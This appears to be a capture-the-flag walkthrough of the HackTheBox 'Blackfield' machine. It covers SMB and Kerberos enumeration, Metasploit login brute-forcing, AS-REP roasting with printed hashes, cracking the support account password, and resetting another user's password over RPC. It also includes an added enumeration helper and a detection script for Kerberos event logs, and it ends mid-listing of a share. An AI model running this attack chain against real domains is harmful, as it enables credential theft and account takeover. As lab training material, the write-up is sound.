HTB Blackfield Walkthrough
Welcome back to another HackTheBox machine pentesting session; this time I am going to tackle the Blackfield box.
As always I start off with an Nmap scan!
sudo nmap -A -T4 10.10.10.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:16 CEST
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-10 23:21:30Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h04m14s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-10T23:21:51
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 50.28 ms 10.10.14.1
2 54.39 ms 10.10.10.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.54 seconds
I see a moderate list of open ports in the Nmap scan. Let's try to enumerate with enum4linux.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ enum4linux -s /usr/share/enum4linux/share-list.txt 10.10.10.192
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 11 10:57:35 2020
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
c$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
admin$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
ipc$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
enum4linux complete on Thu Jun 11 10:58:57 2020
Nothing particular to highlight beyond a few shares; let's dig deeper.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient -L 10.10.10.192
Enter WORKGROUP\in7rud3r's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Two interesting additional shares. The first one:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\in7rud3r's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
It doesn't seem useful... for now. Let's try the second one:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\in7rud3r's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
[...]
ZScozzari D 0 Wed Jun 3 18:47:12 2020
ZTimofeeff D 0 Wed Jun 3 18:47:12 2020
ZWausik D 0 Wed Jun 3 18:47:12 2020
7846143 blocks of size 4096. 3952597 blocks available
I show only part of the list, but trust me, it is a really long list of users. Let's check whether there is anything interesting inside the folders.
smb: \> cd AAlleni
smb: \AAlleni\> ls
. D 0 Wed Jun 3 18:47:11 2020
.. D 0 Wed Jun 3 18:47:11 2020
7846143 blocks of size 4096. 3952597 blocks available
smb: \AAlleni\> cd ..
smb: \> cd ABarteski
smb: \ABarteski\> ls
. D 0 Wed Jun 3 18:47:11 2020
.. D 0 Wed Jun 3 18:47:11 2020
7846143 blocks of size 4096. 3952469 blocks available
smb: \ABarteski\>
They could all be empty. To be (fairly) sure that every folder is empty, I download the whole content of the share to my machine and check it:
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smb: \>
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ find . -name "*" | grep "/.*/"
This last command lists every file name inside the folder, recursively; if anything were in the subfolders it would show on the shell, but nothing appears, so the folders are all empty. Still, I have a big list of user names that I can turn into a file.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ cd smb/
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ cd ..
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ find ./smb/ -name "*" | cut -b 7- > user-list.txt
Now I need a password list too; let's search the files already available on the system.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ sudo find /usr/share/ -name "*password*.txt"
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
/usr/share/cisco-torch/password.txt
/usr/share/setoolkit/htk-lite/commandinfo/password.txt
/usr/share/brutex/wordlists/vnc-default-passwords.txt
/usr/share/brutex/wordlists/password_weak.txt
/usr/share/brutex/wordlists/password_medium.txt
/usr/share/exploitdb-papers/papers/english/12914-mpi-and-password-cracking.txt
/usr/share/truecrack/most_common_password_10k.txt
/usr/share/doc/funkload/examples/demo/cmf/passwords.txt
/usr/share/commix/src/txt/passwords_john.txt
Ok, I have to admit that I tried a brute-force attack, but after a while I realised it would take far too long, so I settled for a simpler one.
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file ./user-list.txt
user_file => ./user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.10.192:445 - 10.10.10.192:445 - Starting SMB login bruteforce
[+] 10.10.10.192:445 - 10.10.10.192:445 - Success: '.\:' Guest
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\RVallandas:RVallandas',
[!] 10.10.10.192:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\APustulka:APustulka',
[...]
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\ATaueg:ATaueg',
[*] 10.10.10.192:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
But nothing found. Since I am already in the Metasploit Framework, I start searching for Kerberos modules.
msf5 auxiliary(scanner/smb/smb_login) > search kerberos
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
1 auxiliary/gather/get_user_spns 2014-09-27 normal No Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
2 auxiliary/gather/kerberos_enumusers normal No Kerberos Domain User Enumeration
3 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
4 post/windows/escalate/golden_ticket normal No Windows Escalate Golden Ticket
This one could be interesting.
msf5 auxiliary(scanner/smb/smb_login) > info auxiliary/gather/kerberos_enumusers
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matt Byrne <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.
References:
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
Let me try.
msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > set domain BLACKFIELD
domain => BLACKFIELD.htb
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(gather/kerberos_enumusers) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192
[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "rvallandas"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "rvallandas" does not exist
[*] 10.10.10.192:88 - Testing User: "apustulka"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "apustulka" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "audit2020"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "audit2020" is present
[...]
[*] 10.10.10.192:88 - Testing User: "svc_backup"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "svc_backup" is present
[...]
[*] 10.10.10.192:88 - Testing User: "support"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x0000561b96b38438>
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed
Well, I identified some real accounts on the machine, but the execution stops on the "support" user. Don't forget this; extract the remaining users the module did not process and run it again to complete the original list.
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192
[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "gmaroufkhani"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "gmaroufkhani" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "ataueg"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "ataueg" does not exist
[*] Auxiliary module execution completed
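Splitting the list by hand after a crash is error-prone, so here is a small script that does what the step above describes: it reads the module output, records the users reported present, and writes the users that were never tested to a new USER_FILE. It is an added example, not part of the original write-up; the output excerpt and the user list are constructed stand-ins in the format shown above. Note that the user on which the module crashed is reported separately: the KDC sent a response rather than an error, which is what happens for an account without pre-authentication, so that user deserves a closer look instead of being dropped.

```python
"""Resume a kerberos_enumusers run that aborted part-way through the user list."""
import re

# Constructed excerpt in the module's output format (not the full original run).
MODULE_OUTPUT = """\
[*] 10.10.10.192:88 - Testing User: "rvallandas"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "rvallandas" does not exist
[*] 10.10.10.192:88 - Testing User: "apustulka"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "apustulka" does not exist
[*] 10.10.10.192:88 - Testing User: "audit2020"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "audit2020" is present
[*] 10.10.10.192:88 - Testing User: "svc_backup"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "svc_backup" is present
[*] 10.10.10.192:88 - Testing User: "support"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x0000561b96b38438>
"""

# Constructed stand-in for user-list.txt (the profiles$ directory names, mixed case).
USER_LIST = ["RVallandas", "APustulka", "audit2020", "svc_backup",
             "support", "GMaroufkhani", "ATaueg"]

TESTED_RE = re.compile(r'Testing User: "([^"]+)"')
PRESENT_RE = re.compile(r'User: "([^"]+)" is present')


def summarize_run(output):
    """Return (users reported present, last user tested, whether the run aborted)."""
    tested = TESTED_RE.findall(output)
    present = PRESENT_RE.findall(output)
    aborted = "Auxiliary failed" in output
    return present, (tested[-1] if tested else None), aborted


def plan_rerun(output, user_list):
    """Split the original list into done, crashed-on (suspect) and still to test.

    The module lower-cases names, so matching is case-insensitive. The user on
    which the module crashed received a KDC response the module could not
    parse instead of an error, so it is reported as a suspect, not dropped.
    """
    present, last, aborted = summarize_run(output)
    lowered = [u.lower() for u in user_list]
    if last is None or last.lower() not in lowered:
        return {"present": present, "suspects": [], "remaining": list(user_list)}
    idx = lowered.index(last.lower())
    suspects = [user_list[idx]] if aborted else []
    return {"present": present, "suspects": suspects, "remaining": user_list[idx + 1:]}


def write_user_file(path, users):
    """Write one user per line, the format USER_FILE expects; returns the count."""
    with open(path, "w") as fh:
        fh.write("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    plan = plan_rerun(MODULE_OUTPUT, USER_LIST)
    print("present :", plan["present"])
    print("suspects:", plan["suspects"])
    n = write_user_file("user-list-remaining.txt", plan["remaining"])
    print("remaining users written:", n)
```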
Well, two good users (and one suspect): audit2020 and svc_backup. It should be much simpler to brute-force with only these two users, so I go back to the previous module with just them, but the process is too slow again. I have to look for a different way.
msf5 auxiliary(gather/kerberos_enumusers) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.192 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE user-list.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/truecrack/most_common_password_10k.txt
pass_file => /usr/share/truecrack/most_common_password_10k.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file ''
user_file =>
msf5 auxiliary(scanner/smb/smb_login) > set smbUser audit2020
smbUser => audit2020
msf5 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.10.192:445 - 10.10.10.192:445 - Starting SMB login bruteforce
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\audit2020:audit2020',
[!] 10.10.10.192:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\audit2020:password',
[...]
Another useful toolkit for Windows machines is impacket; I have used it on many other HTB machines, and it has many tools that help with enumeration. I could use the small list with the three users (two sure, one doubtful) identified in the previous step, but I want to be sure about every entry available to me, so I run the tool on the entire list and... surprise.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD/ -no-pass -usersfile ../../user-list.txt
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
[-] invalid principal syntax
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD:7b456002ef8933746d6ce43ea72d7202$07cc3c311dd56116bd44ecac96cfc76d62bbbfa92a41c4579e7ddf08650e81b763eee96251f0e8b4c4c63f8f4dfc58a0cafbdda950912ee0f726247c0981232488fac2acc52179b6f1349e2baf1a5a7df442c0d22cfec12384133a9b88d585d33de25b157c39777f91f5245ae2738fe17ab386e0e313e55d0ccdad77e46093a93302631a7d8790295180d10d58bae24879b4650f20515a230a54547c17fbc5b9c55addc6caab793be4e0e3e202c006df39884a4afb13788eafe222a75563b6817501be4566ef3ea4bbf1ea4f2a9aa5f600c9e9a98f8480d1cca6f7ac94fd5e4c1d9afd11abac2a3e58259b245c2d
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
As I understand it, this confirms the presence of the two users (audit2020 and svc_backup) and of the support user that caused the error in the Metasploit module, this time providing a password hash. Ok, take the hash in hashcat format:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -format hashcat -dc-ip 10.10.10.192 BLACKFIELD/support -no-pass
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD:fb60c0c7175cc8a20c23b981b97dc607$3ada2343cb0398525c6edbed97e176ba6f7216924bc97f745ea3d0dbc8b6aea5bdf18cb34c3106e7783584dc8bee0900fcee6980d57bbcdb1daaa2d61e593ec3befa8fe52c79de29dbca7a9ae959f816d383502054522ad3b72c796549231ed8c7731eaaccc8f10c2bb28a075a0aa8c1019bd128867db4dd222fc22b2271f419521c34d44d982d3ed9457b6d30b687fdad7eb2b856cd97c54dce354ea71073649dad5065db90544144d96cf726ae6b35dbb026693a41af5665631c77a04894377005ff8a82fe939d1dd16bb067cf779e166d76501072918f9879beb95c6d0ea4ce480da341b21f75858ae24287c6
And use John the Ripper to crack the hash:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ john --wordlist=/usr/share/wordlists/rockyou.txt support.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD)
1g 0:00:01:02 DONE (2020-06-16 11:50) 0.01609g/s 230762p/s 230762c/s 230762C/s #00p3r..#+*=%
Use the "--show" option to display all of the cracked passwords reliably
Session completed
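Both Kerberos techniques used so far, user enumeration through the KDC error codes and the AS-REP request for an account that needs no pre-authentication, leave the same trace on the domain controller: event 4768 (Kerberos authentication ticket requested). The detection script below is an added example, not part of the original write-up. The event records are constructed in a simplified key=value form, not real Blackfield logs; the Status, PreAuthType and TicketEncryptionType values follow the Windows 4768 schema.

```python
"""Spot Kerberos user enumeration and AS-REP roasting in DC event 4768 records.

Status 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN  (user does not exist)
Status 0x19 = KDC_ERR_PREAUTH_REQUIRED     (user exists, pre-auth needed)
Status 0x0  = TGT issued
PreAuthType 0 on a successful request = no pre-authentication was performed
TicketEncryptionType 0x17 = RC4-HMAC (etype 23, the $krb5asrep$23$ hash format)
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real Blackfield logs): an enumeration burst and
# an AS-REP without pre-auth from 10.10.14.5, followed by ordinary traffic.
SAMPLE_EVENTS = """\
EventID=4768 Time=2020-06-11T09:01:00 TargetUserName=rvallandas IpAddress=10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:01 TargetUserName=apustulka IpAddress=10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:01 TargetUserName=aalleni IpAddress=10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:02 TargetUserName=abarteski IpAddress=10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:02 TargetUserName=audit2020 IpAddress=10.10.14.5 Status=0x19 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:03 TargetUserName=abekesz IpAddress=10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:03 TargetUserName=svc_backup IpAddress=10.10.14.5 Status=0x19 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 Time=2020-06-11T09:01:04 TargetUserName=support IpAddress=10.10.14.5 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17
EventID=4768 Time=2020-06-11T09:05:00 TargetUserName=svc_backup IpAddress=10.10.10.192 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
EventID=4768 Time=2020-06-11T09:07:00 TargetUserName=jsmith IpAddress=10.10.10.50 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
"""


def parse_events(text):
    """Parse one key=value record per line (the constructed format) into dicts."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(tok.split("=", 1) for tok in line.split())
        fields["Time"] = datetime.fromisoformat(fields["Time"])
        events.append(fields)
    return events


def detect_user_enumeration(events, threshold=5, window=timedelta(minutes=1)):
    """Flag a source IP that asks for TGTs of `threshold` or more distinct unknown
    principals (Status 0x6) within `window`: the footprint of kerberos_enumusers
    or krb5-enum-users walking a user list. A single typo never reaches it."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["EventID"] == "4768" and ev["Status"].lower() == "0x6":
            by_ip[ev["IpAddress"]].append((ev["Time"], ev["TargetUserName"].lower()))
    alerts = []
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            names = {user for t, user in hits[i:] if t - start <= window}
            if len(names) >= threshold:
                alerts.append({"ip": ip, "unknown_users": len(names), "first_seen": start})
                break  # one alert per source is enough
    return alerts


def detect_asrep_roast(events):
    """Flag TGTs issued with no pre-authentication (PreAuthType 0). With RC4
    (0x17) the reply is exactly the $krb5asrep$23$ material cracked above."""
    alerts = []
    for ev in events:
        if ev["EventID"] == "4768" and ev["Status"].lower() == "0x0" and ev["PreAuthType"] == "0":
            etype = ev["TicketEncryptionType"].lower()
            alerts.append({"user": ev["TargetUserName"], "ip": ev["IpAddress"],
                           "etype": etype, "offline_crackable": etype == "0x17"})
    return alerts


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for alert in detect_user_enumeration(evs):
        print("possible Kerberos user enumeration:", alert)
    for alert in detect_asrep_roast(evs):
        print("AS-REP issued without pre-auth:", alert)
```

The same AS-REP alert is the place to check userAccountControl for the "do not require Kerberos preauthentication" flag, which is what GetNPUsers looks for.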
Nice, the password of the support user seems to be "#00^BlackKnight". I try the credential, and the only way I can connect with it is the rpcclient command:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ rpcclient -U BLACKFIELD\\support 10.10.10.192
Enter BLACKFIELD\support's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
[...]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
Next step is to search for a way to exploit some information through rpcclient; searching on the internet:
I can change users' passwords, good, I have to try again. On the remote machine:
rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'
It seems that we are lucky today. And on the local machine:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ net rpc password audit2020 -U support -S 10.10.10.192
Enter new password for audit2020:
Enter WORKGROUP\support's password:
Good; again, retrace your steps and try an SMB connection with this new credential.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ smbclient -U audit2020 //10.10.10.192/forensic
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
7846143 blocks of size 4096. 3667024 blocks available
smb: \>
This time it is the forensic shared folder that is accessible, fine. After a quick look at the files inside these folders, I understand that to investigate properly it would be best to download all the content to my PC and work locally. However, I can skip the files inside the tools folder, so I start the download and stop it when the process begins to fetch those files. In fact, in the tools folder:
smb: \> cd tools\
smb: \tools\> ls
. D 0 Sun Feb 23 14:39:08 2020
.. D 0 Sun Feb 23 14:39:08 2020
